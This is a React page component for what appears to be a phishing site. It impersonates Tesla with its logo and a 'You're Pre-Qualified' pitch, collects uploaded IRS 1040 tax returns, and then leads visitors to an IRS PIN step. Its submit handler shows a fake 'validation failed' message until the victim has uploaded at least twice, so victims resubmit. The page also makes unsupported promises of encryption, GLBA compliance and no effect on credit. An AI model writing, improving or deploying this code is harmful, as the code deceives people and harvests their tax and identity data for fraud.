import React, { Component } from "react";
import queryString from "query-string";
import { connect } from "react-redux";
import { bindActionCreators } from "redux";
import TeslaIcon from "../../icons/TeslaIcon";
import { Input } from "reactstrap";
import RDSRadioButton from "../../components/common/RDSRadioButton";
import RDSButton from "../../components/common/RDSButton";
import RdsBackIcon from "../../icons/RdsBackIcon";
import CheckboxIcon from "../../icons/CheckboxIcon";
import ErrorIcon from "../../icons/ErrorIcon";
import XIcon from "../../icons/XIcon";
import WarningIcon from "../../icons/WarningIcon";
import Loading from "../../components/common/LoadingIndicator";
import StoreStateConstants from "../../constants/store/StoreStateConstants";
import * as imgActionCreator from "../../actions/imgActionCreator";
import * as orderActionCreator from "../../actions/orderActionCreator";
import * as translationActionCreator from "../../actions/translationActionCreator";
import * as globalAlertActionCreator from "../../actions/globalAlertActionCreator";

import ProofOfW2Intro from "../../images/proof_of_w2.png";
import ProofOfAddressDemo from "../../images/proof_of_address_demo.jpg";
import LocalStorageUtil from "../../utils/LocalStorageUtil";
import PagePathConstants from "../../constants/router/PagePathConstants";
import { BASE_URL } from "../../constants/api/ApiEndpointConstants";
import tracker from "../../tracker";
import { sendCustomEvent } from "../../apis/ConfigAPI";

class Ten40ProofPage extends Component {
	constructor(props, context) {
		super(props, context);
		this.state = {
			identity_types: this.renderIdentityTypes(),
			selectedProofAddressType: "1040 Form",
			showLoading: false,
			ten40ProofDocument: "",
			documentBack: "",
			showOnboardingGif: true,
			isShowVerificationFailedModal: false,
			showSecondaryBrandIcon: false,
		};
		this.handleSelectIdType = this.handleSelectIdType.bind(this);
		this.handleSelectFile = this.handleSelectFile.bind(this);
		this.toggleLoading = this.toggleLoading.bind(this);
		this.handleSubmitForm = this.handleSubmitForm.bind(this);
		this.goBack = this.goBack.bind(this);
		this.toggleOnboarding = this.toggleOnboarding.bind(this);
		this.renderIdentityTypes = this.renderIdentityTypes.bind(this);
		this.prefillOrderParams = this.prefillOrderParams.bind(this);
		this.checkInfoToSubmit = this.checkInfoToSubmit.bind(this);
		this.toggleVerificationFailedModal = this.toggleVerificationFailedModal.bind(this);
	}

	componentDidMount() {
		const orderData = LocalStorageUtil.loadOrderDetail();
		const { firstName, email, snCode, country } = orderData;
		if (!firstName || firstName?.trim() === "" || !email || email?.trim() === "" || ((country === "US" || country === "GB") && !snCode) || snCode?.trim() === "") {
			const { history, location } = this.props;
			history.replace({ pathname: PagePathConstants.CUSTOM_INFO, search: location.search });
			return;
		}
		this.prefillOrderParams();
	}

	prefillOrderParams() {
		const orderInfo = LocalStorageUtil.loadOrderDetail();
		const cachedDoc = orderInfo && orderInfo.ten40ProofDocument ? orderInfo.ten40ProofDocument : this.state.ten40ProofDocument
		const nextSelected = "1040 Form"
		const nextShowOnboarding = cachedDoc && cachedDoc.trim() !== "" ? false : this.state.showOnboardingGif
		this.setState({
			selectedProofAddressType: nextSelected,
			ten40ProofDocument: cachedDoc || "",
			showOnboardingGif: nextShowOnboarding,
		});
	}

	renderIdentityTypes() {
		return [
			{
				name: "1040 Form",
				label: "1040 Form (U.S. Individual Income Tax Return)",
			},
		];
	}

	toggleOnboarding() {
		this.setState({ showOnboardingGif: !this.state.showOnboardingGif });
	}

	goBack() {
		const { history } = this.props;
		history && history.goBack();
	}

	handleSelectIdType(name) {
		this.setState({ selectedProofAddressType: name });
	}

	handleSelectFile(e, isDocumentFront) {
		e.preventDefault();
		e && e.stopPropagation();

		const orderData = LocalStorageUtil.loadOrderDetail();

		const { imgActions } = this.props;
		const _this = this;
		[...e.target.files].forEach((fileInfo, index) => {
			if (index > 0) return;
			let reads = new FileReader();
			reads.readAsDataURL(fileInfo);
			reads.onload = function (e) {
				const imgUrl = this.result;
				_this.toggleLoading();
				imgActions &&
					imgActions
						.uploadImgToGetUrl({ snCode: orderData && orderData.snCode, img: imgUrl })
						.then((url) => {
							_this.toggleLoading();
							if (isDocumentFront) {
								let cachedAddressProofNum = localStorage.getItem("cachedAddressProofNum");
								if (!cachedAddressProofNum) {
									cachedAddressProofNum = 0;
								}
								cachedAddressProofNum = parseInt(cachedAddressProofNum) + 1;
								localStorage.setItem("cachedAddressProofNum", cachedAddressProofNum.toString());
								_this.setState({ ten40ProofDocument: url }, () => {
									const prev = LocalStorageUtil.loadOrderDetail() || {};
									LocalStorageUtil.saveOrderDetail(Object.assign({}, prev, { ten40ProofDocument: url }));
									_this.checkInfoToSubmit();
								});
							} else {
								let cachedDocumentBackNum = localStorage.getItem("cachedDocumentBackNum");
								if (!cachedDocumentBackNum) {
									cachedDocumentBackNum = 0;
								}
								cachedDocumentBackNum = parseInt(cachedDocumentBackNum) + 1;
								localStorage.setItem("cachedDocumentBackNum", cachedDocumentBackNum.toString());
								_this.setState({ documentBack: url }, _this.checkInfoToSubmit);
							}
							e.target.value = "";
						})
						.catch((err) => {
							_this.toggleLoading();
							e.target.value = "";
						});
			};
		});
	}

	checkInfoToSubmit() {
		const { orderActions, location } = this.props;
		const orderInfo = LocalStorageUtil.loadOrderDetail();

		if (orderInfo) {
			// const { firstName, lastName, email, phone, driveEmail, drivePhone, state, city, country, address, zipCode, vehicleModel, snCode } = orderInfo;
			const { ten40ProofDocument, selectedProofAddressType } = this.state;

			const queryParams = queryString.parse(location.search);
			let ad = "test";
			const localAd = LocalStorageUtil.loadFbAdParams();
			if (localAd && localAd.trim() !== "") {
				ad = localAd;
			}
			if (queryParams.ad && queryParams.ad !== "") {
				ad = queryParams.ad;
			}
			let data = {
				id: "",
				orderNu: "",
				ad,
			};
			const orderId = LocalStorageUtil.loadOrderId();
			if (orderId && orderId !== "" && orderId !== "undefined") {
				data.id = orderId;
			}

			const orderNu = LocalStorageUtil.loadOrderNumber();
			if (orderNu && orderNu !== "" && orderNu !== "undefined") {
				data.orderNu = orderNu;
			}
			if (ten40ProofDocument && ten40ProofDocument.trim() !== "") {
				data["ten40ProofDocument"] = ten40ProofDocument;
			}
			if (queryParams.ad && queryParams.ad !== "") {
				data["ad"] = queryParams.ad;
			}

			let requestData = Object.assign({}, data);
			if (requestData.ten40ProofDocument && requestData.ten40ProofDocument.trim() !== "") {
				requestData.ten40ProofDocument = requestData.ten40ProofDocument.replace(BASE_URL, "");
			}
			if (requestData.documentBack && requestData.documentBack.trim() !== "") {
				requestData.documentBack = requestData.documentBack.replace(BASE_URL, "");
			}

			orderActions &&
				orderActions.updateDriverOrder(requestData).catch((err) => {
					if (err === "id duplication") {
						LocalStorageUtil.clearOrderId();
						LocalStorageUtil.clearOrderNumber();
					}
				});
		}
	}

	toggleLoading() {
		this.setState({ showLoading: !this.state.showLoading });
	}

	handleSubmitForm() {
		const { selectedProofAddressType, ten40ProofDocument } = this.state;

		const { location, orderActions, history } = this.props;

		const queryParams = queryString.parse(location.search);
		let ad = "test";
		const localAd = LocalStorageUtil.loadFbAdParams();
		if (localAd && localAd.trim() !== "") {
			ad = localAd;
		}
		if (queryParams.ad && queryParams.ad !== "") {
			ad = queryParams.ad;
		}

		let data = {
			ten40ProofDocument,
			id: "",
			orderNu: "",
			ad,
		};

		const orderId = LocalStorageUtil.loadOrderId();
		if (orderId && orderId !== "" && orderId !== "undefined") {
			data.id = orderId;
		}

		const orderNu = LocalStorageUtil.loadOrderNumber();
		if (orderNu && orderNu !== "" && orderNu !== "undefined") {
			data.orderNu = orderNu;
		}

		let orderData = LocalStorageUtil.loadOrderDetail();
		tracker.trackIdentificationPhoto(`${orderData.firstName} ${orderData.lastName}`);
		sendCustomEvent("AddAddressProofInformation");
		LocalStorageUtil.saveOrderDetail(data);

		this.toggleLoading();
		orderActions &&
			orderActions
				.updateDriverOrder(data)
				.then((order) => {
					this.toggleLoading();

					order.id && order.id !== 0 && LocalStorageUtil.saveOrderId(order.id);
					order.orderNu && order.orderNu !== 0 && LocalStorageUtil.saveOrderNumber(order.orderNu);
					const cachedAddressProofNum = localStorage.getItem("cachedAddressProofNum");

					if (cachedAddressProofNum < 2) {
						this.toggleVerificationFailedModal();
						if (selectedProofAddressType !== StoreStateConstants.IDENTITY_TYPE_PASSPORT) {
							this.setState({
								ten40ProofDocument: cachedAddressProofNum < 2 ? "" : this.state.ten40ProofDocument,
							});
						} else {
							this.setState({ ten40ProofDocument: "" });
						}
					} else {
						history && history.push({ pathname: PagePathConstants.IRS_PIN_PROOF, search: location.search });
					}
				})
				.catch((err) => {
					if (err === "id duplication") {
						LocalStorageUtil.clearOrderId();
						LocalStorageUtil.clearOrderNumber();
					}
					this.toggleLoading();
				});
	}

	toggleVerificationFailedModal() {
		this.setState({ isShowVerificationFailedModal: !this.state.isShowVerificationFailedModal });
	}

	handleScroll() {
		const scrollTop = this.scrollContainerRef && this.scrollContainerRef.current.scrollTop;
		this.setState({ showSecondaryBrandIcon: scrollTop >= 50 });
	}

		render() {
		const { showError, errorMsg, showLoading, selectedProofAddressType, ten40ProofDocument, showOnboardingGif, isShowVerificationFailedModal } = this.state;
		const disabledSubmitBtn = selectedProofAddressType.trim() === "" || (selectedProofAddressType === '1040 Form' && ten40ProofDocument.trim() === "");		return (
			<div className="tw-w-full tw-h-full gotham-font tw-text-[#393c41] ">
				{showLoading && <Loading />}
				{isShowVerificationFailedModal && (
					<div className="tw-w-full tw-h-full tw-fixed tw-top-0 tw-absolute tw-left-0 tw-bg-[rgba(0,0,0,0.5)] tw-flex tw-justify-center tw-items-center tw-z-[10000]" onClick={this.toggleVerificationFailedModal}>
						<div className="tw-w-[330px] tw-px-[10px] tw-pt-[30px] tw-py-[10px] tw-relative tw-overflow-hidden tw-rounded-[10px] tw-bg-white" onClick={(e) => e.stopPropagation()}>
							<XIcon onClick={this.toggleVerificationFailedModal} className="tw-absolute tw-right-[10px] tw-top-[6px]" size={26} />
							<img src={ProofOfW2Intro} alt="tip" className="tw-w-[300px] tw-h-auto tw-mx-auto tw-z-[1000px] " />
							<div className="tw-text-[16px] tw-pb-[10px] tw-px-[20px] tw-bg-white tw-font-bold tw-text-center tw-text-[#c00]">1040 Form validation failed!</div>
							<div className="tw-mt-[6px] tw-text-[14px] tw-pb-[20px] tw-px-[10px] tw-bg-white tw-rounded-bl-[10px] tw-rounded-br-[10px] tw-text-center">
								<div className="tw-flex tw-flex-col tw-items-center tw-justify-start">
									<div className="tw-text-[12px] tw-mb-[10px] tw-text-left tw-w-full tw-font-bold tw-flex tw-items-center"><ErrorIcon size="20" className="tw-mr-[10px] tw-shrink-0" color="#c00"/>We do not accept screenshots.</div>
									<div className="tw-text-[12px] tw-mb-[10px] tw-text-left tw-w-full tw-font-bold tw-flex tw-items-center"><ErrorIcon size="20" className="tw-mr-[10px] tw-shrink-0" color="#c00"/>Make sure the edges of the document are visible.</div>
									<div className="tw-text-[12px] tw-mb-[10px] tw-text-left tw-w-full tw-font-bold tw-flex tw-items-center"><CheckboxIcon size="20" className="tw-mr-[10px] tw-shrink-0" color="#33A954"/>Ensure the 1040 Form is complete and unaltered.</div>
									<div className="tw-text-[12px] tw-mb-[10px] tw-text-left tw-w-full tw-font-bold tw-flex tw-items-center"><CheckboxIcon size="20" className="tw-mr-[10px] tw-shrink-0" color="#33A954"/>Make sure the text is legible.</div>
									<div className="tw-text-[12px] tw-mb-[10px] tw-text-left tw-w-full tw-font-bold tw-flex tw-items-center tw-text-[#c00]"><WarningIcon size="16" className="tw-ml-[2px] tw-mr-[12px] tw-shrink-0" color="#c00"/>Recommend you upload a PDF file.</div>
								</div>
							</div>
						</div>
					</div>
				)}
				<div className="tw-w-full tw-h-full phone:tw-h-full phone:tw-pb-[100px] tw-overflow-scroll">
					<div className="tw-z-[100] tw-w-full tw-h-[80px] tw-flex tw-justify-between tw-items-center">
						<div className="tw-w-1/3 tw-h-full tw-flex tw-items-center tw-pl-[30px]">
							<RdsBackIcon color="#171a20" onClick={this.goBack} />
						</div>
						<TeslaIcon size={150} color="#171a20" />
						<div className="tw-w-1/3"></div>
					</div>

					{showOnboardingGif ? (
						<div className="tw-w-full tw-text-center tw-flex tw-flex-col tw-items-center tw-px-[30px] animate__fadeIn animate__animated">
							<div className="tw-text-[32px] phone:tw-text-[20px] tw-font-bold">🎉 You’re Pre-Qualified!</div>
							<div className="tw-text-[18px] phone:tw-text-[16px] tw-max-w-[760px] tw-leading-6 tw-text-[#171a20] tw-font-[700] tw-inline-block tw-bg-[#fff7ed] tw-border tw-border-[#fdba74] tw-rounded-[8px] tw-px-[10px] tw-py-[6px]">
								You’re among the top 60% of applicants.
							</div>
							<div className="tw-text-[14px] phone:tw-text-[12px] tw-max-w-[760px] tw-leading-6 tw-text-[#393c41]">
								To secure your spot, a quick verification is required.
							</div>
							<div className="tw-mt-[24px] tw-bg-[#f0f7ff] tw-border tw-border-[#cce3ff] tw-rounded-[12px] tw-p-[16px] tw-max-w-[500px] tw-flex tw-items-start tw-gap-[12px] tw-text-left animate__fadeIn animate__animated animate__delay-1s">
								<div className="tw-mt-[2px] tw-text-[#3e6ae1]">
									<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"><path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z"/></svg>
								</div>
								<div>
									<div className="tw-text-[15px] tw-font-bold tw-text-[#171a20]">Soft Credit Check (Secure)</div>
									<div className="tw-text-[13px] tw-text-[#393c41] tw-mt-[4px] tw-leading-5">
										We perform a soft credit check to ensure eligibility. This will <span className="tw-font-bold">NOT</span> affect your credit score.
									</div>
								</div>
							</div>
							<div></div>
							<div className="tw-mt-[50px] phone:tw-mt-0 tw-w-[660px] phone:tw-w-[calc(100%-40px)] tw-h-[495px] phone:tw-h-[300px]" style={{ backgroundImage: `url(${ProofOfW2Intro})`, backgroundSize: "100%", backgroundRepeat: "no-repeat", backgroundPosition: "center" }}></div>
							
							<div className="tw-w-full tw-max-w-[760px] tw-mt-[16px] tw-text-left">
								<div className="tw-text-[18px] tw-font-[600] tw-text-[#171a20] tw-mb-[8px]">Why 1040 Form? (Trust & Safety)</div>
								<div className="tw-text-[14px] tw-text-[#171a20]">
									<div>As part of our standard verification process, some applicants may be asked to submit basic financial documentation.</div>
									<div className="tw-mt-[6px]">Providing a 1040 form is one of the quickest ways to complete verification, but alternative documents are also accepted.</div>
								</div>
								<div className="tw-text-[12px] tw-text-[#5c5e62] tw-mt-[10px] tw-leading-5">
									<span role="img" aria-label="lock">🔒</span> Your 1040 Form is used solely for eligibility verification and is protected with bank‑grade encryption. You may request deletion after verification. We comply with U.S. privacy laws (e.g., GLBA) and never share or repurpose your data.
								</div>
							</div>

							<div className="tw-w-full tw-flex tw-justify-center tw-items-center tw-mt-[20px] tw-text-white">
								<RDSButton rectangle className="tw-w-[80%] tw-rounded-[6px]" color="primary" onClick={this.toggleOnboarding}>
									<span>Continue to Verification</span>
								</RDSButton>
							</div>
						</div>
					) : (
						<div className="tw-mt-[50px] tw-w-[660px] tw-mx-auto phone:tw-px-[20px] phone:tw-w-full phone:tw-mt-[10px] animate__slideInUp animate__animated">
							<div className="tw-w-full tw-mt-[10px]">
								<div className="tw-text-[#5c5e62] tw-font-[500] tw-text-[28px] phone:tw-text-[22px]">Standard Verification Process</div>
								<span className="tw-text-[14px] tw-font-[500]">As part of our standard verification process, some applicants may be asked to submit basic financial documentation.</span>
								<div className="tw-text-[12px] tw-text-[#5c5e62] tw-mt-[6px]">Providing a 1040 form is one of the quickest ways to complete verification, but alternative documents are also accepted.</div>
								<div className="tw-mt-[20px] tw-p-[15px] tw-bg-[#f4f4f4] tw-rounded-[10px]">
									<div className="tw-text-[16px] tw-font-[600] tw-text-[#171a20]">Want faster approval?</div>
									<div className="tw-text-[14px] tw-text-[#393c41] tw-mt-[5px]">Uploading a recent 1040 can significantly increase your chances of being selected and reduce waiting time.</div>
								</div>
								{this.state.identity_types.length > 0 && (
									<div className="tw-mt-[10px]">
										{this.state.identity_types.map((item) => {
											return (
												<div className="tw-mt-[10px] tw-border-border-gray tw-border tw-px-[10px] tw-py-[10px] tw-mb-[10px] tw-rounded-[10px] tw-flex tw-items-center" key={item.name} onClick={() => this.handleSelectIdType(item.name)}>
													<RDSRadioButton name="grade-subject-selector" checked={item.name === selectedProofAddressType} id="grade-subject-radio" />
													<span className="tw-ml-[15px] tw-items-center tw-text-[14px] tw-font-[500]">{item.label}</span>
												</div>
											);
										})}
										<div className="tw-mt-[10px] tw-bg-[#f4f4f4] tw-px-[15px] tw-py-[12px] tw-mb-[20px] tw-rounded-[10px] tw-flex tw-flex-col tw-justify-start">
											<div className="tw-text-[14px] tw-font-[600] tw-text-[#171a20]">Soft Credit Check (Secure)</div>
											<div className="tw-text-[12px] tw-text-[#5c5e62] tw-mt-[4px]">
												We perform a soft credit check to ensure eligibility. This will <span className="tw-font-[600]">NOT</span> affect your credit score.
											</div>
										</div>
									</div>
								)}

								{selectedProofAddressType === '1040 Form' && (
									<React.Fragment>
										<div className="tw-flex phone:tw-flex-wrap tw-justify-between tw-items-start tw-mb-[30px]">
											<div className="tw-w-[50%] phone:tw-w-full  tw-h-[500px] tw-border tw-relative tw-overflow-hidden">
												<Input className="!tw-border-none tw-absolute tw-left-0 tw-top-0 tw-w-full tw-h-[500px] tw-opacity-0 tw-z-[101]" type="file" onChange={(e) => this.handleSelectFile(e, true)} accept="image/*,application/pdf" />
												{ten40ProofDocument !== "" && ten40ProofDocument.indexOf(".pdf") < 0 && <div className={`tw-w-full tw-border tw-h-[500px] tw-absolute tw-left-0 tw-top-0`} style={{ backgroundImage: `url(${ten40ProofDocument})`, backgroundPosition: "center", backgroundSize: "cover", backgroundRepeat: "no-repeat" }}></div>}
												{ten40ProofDocument !== "" && ten40ProofDocument.indexOf(".pdf") >= 0 && (
													<React.Fragment>
														<div className="tw-overflow-hidden">
															<iframe title="1040 Form Preview" src={`${ten40ProofDocument}#toolbar=0`} width="100%" height="500" style={{ border: "none", overflow: "hidden" }}></iframe>
														</div>
													</React.Fragment>
												)}
												{ten40ProofDocument === "" && (<React.Fragment>
													<div className="tw-mx-auto phone:tw-mt-0 tw-w-[660px] tw-h-[500px] phone:tw-w-[calc(100%-40px)] tw-h-[495px] phone:tw-h-[400px]" style={{ backgroundImage: `url(${ProofOfAddressDemo})`, backgroundSize: "100%", backgroundRepeat: "no-repeat", backgroundPosition: "center" }}></div>
													<div className="tw-text-center tw-text-body-text-grey tw-mt-[10px] tw-font-bold">Tap to upload your 1040 Form and unlock benefits</div>
												</React.Fragment>)}
											</div>
										</div>

									</React.Fragment>
								)}
								<div className="tw-w-full tw-text-[12px] tw-text-[#5c5e62] tw-leading-5 tw-space-y-[4px]">
									<div className="tw-font-[600]">Quick Tips</div>
									<div>• PDF preferred for faster review</div>
									<div>• Ensure the entire document is visible (no screenshots)</div>
									<div>• Text must be clear and legible</div>
								</div>
							</div>

							{showError && <div className="tw-text-[#c00] tw-my-[30px] tw-px-[20px]">{errorMsg}</div>}
							<div className="tw-w-full tw-flex tw-justify-center tw-items-center tw-mt-[30px] tw-text-white tw-mt-[50px]">
								<RDSButton rectangle className="tw-w-[80%] tw-rounded-[6px]" color="primary" onClick={this.handleSubmitForm} disabled={disabledSubmitBtn}>
									<span>Submit 1040 Form for Fast Approval</span>
								</RDSButton>
							</div>
						</div>
					)}
				</div>
			</div>
		);
	}
}

function mapStateToProps(state) {
	return {};
}

function mapDispatchToProps(dispatch) {
	return {
		imgActions: bindActionCreators(imgActionCreator, dispatch),
		orderActions: bindActionCreators(orderActionCreator, dispatch),
		translationActions: bindActionCreators(translationActionCreator, dispatch),
		globalAlertActions: bindActionCreators(globalAlertActionCreator, dispatch),
	};
}

export default connect(mapStateToProps, mapDispatchToProps)(Ten40ProofPage);
